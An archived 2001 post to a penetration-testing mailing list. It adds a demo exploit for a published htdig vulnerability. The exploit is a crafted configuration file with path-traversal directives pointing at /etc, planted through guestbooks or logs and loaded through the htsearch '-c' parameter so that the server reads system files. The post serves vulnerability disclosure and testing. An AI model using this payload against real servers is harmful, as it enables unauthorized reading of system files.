htdig HOWTO followup
From: rudi carell (rudicarell@hotmail.com)Date: 10/18/01
- Previous message: Matthew Leeds: "Re: Lab leads??"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "rudi carell" <rudicarell@hotmail.com> To: PEN-TEST@SECURITYFOCUS.COM Subject: htdig HOWTO followup Date: Thu, 18 Oct 2001 08:19:09 Message-ID: <F178wxqeas7N6gZIz4o0000777f@hotmail.com>
hola,
just wanted to add an example to the recently posted htdig vulnerability (
credits to ghutchis@wso.williams.edu ) ... the problem is that there is no
detailed info on how to test it ..
---cut here---
http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3410
---cut here---
therefore ... a demo-exploit for a better understanding:
create a file with the following content anywhere on the maschine htdig runs
on (be creative an think of guestbooks, logfiles etc etc ..):
---cut here---
nothing_found_file: /etc/hosts
database_base: ${database_dir}/../../../../etc/
word_db: ${database_base}hosts
doc_index: ${database_base}hosts
doc_db: ${database_base}hosts
---cut here---
.. then let htsearch use it :
---cut here--
http://server.cc/cgi-bin/htsearch?-c+[name-of-file]
---cut here---
done ..
rC
security@freefly.com
http://www.freefly.com/security/
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Matthew Leeds: "Re: Lab leads??"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
